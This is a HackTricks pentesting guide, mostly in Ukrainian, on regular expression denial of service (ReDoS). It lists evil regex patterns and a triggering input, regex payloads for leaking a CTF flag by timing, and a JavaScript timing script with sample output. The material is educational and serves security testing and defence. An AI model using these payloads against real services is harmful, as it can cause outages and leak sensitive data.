hacktricks/pentesting-web/regular-expression-denial-of-service-redos.md

7.7 KiB
Raw Blame History

Regular expression Denial of Service - ReDoS

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Regular Expression Denial of Service (ReDoS)

Відмова в обслуговуванні через регулярні вирази (ReDoS) відбувається, коли хтось використовує слабкі місця в тому, як працюють регулярні вирази (спосіб пошуку та зіставлення шаблонів у тексті). Іноді, коли використовуються регулярні вирази, вони можуть ставати дуже повільними, особливо якщо обсяг тексту, з яким вони працюють, збільшується. Ця повільність може настільки погіршитися, що зростає дуже швидко навіть при незначному збільшенні розміру тексту. Зловмисники можуть використовувати цю проблему, щоб змусити програму, яка використовує регулярні вирази, перестати працювати належним чином на тривалий час.

Проблемний алгоритм Regex Naïve

Перевірте деталі в https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

Злі Regexes

Злий шаблон регулярного виразу - це той, який може застрягти на створеному вводі, викликавши DoS. Злі шаблони регулярних виразів зазвичай містять групування з повторенням і повторення або чергування з перекриттям всередині повторюваної групи. Деякі приклади злих шаблонів включають:

  • (a+)+
  • ([a-zA-Z]+)*
  • (a|aa)+
  • (a|a?)+
  • (.*a){x} для x > 10

Усі вони вразливі до вводу aaaaaaaaaaaaaaaaaaaaaaaa!.

ReDoS Payloads

Витік рядка через ReDoS

У CTF (або програмі винагороди за помилки) ви, можливо, контролюєте Regex, з яким збігається чутлива інформація (прапор). Тоді може бути корисно зробити сторінку замороженою (тайм-аут або тривалий час обробки), якщо Regex збігся і не якщо не збігся. Таким чином, ви зможете викрасти рядок символ за символом:

  • У цьому пості ви можете знайти це правило ReDoS: ^(?=<flag>)((.*)*)*salt$
  • Приклад: ^(?=HTB{sOmE_fl§N§)((.*)*)*salt$
  • У цьому звіті ви можете знайти це: <flag>(((((((.*)*)*)*)*)*)*)!
  • У цьому звіті він використав: ^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

Контроль вводу та Regex в ReDoS

Наступні є прикладами ReDoS, де ви контролюєте як ввід, так і regex:

function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$",   //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

Інструменти

Посилання

{% hint style="success" %} Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks
{% endhint %}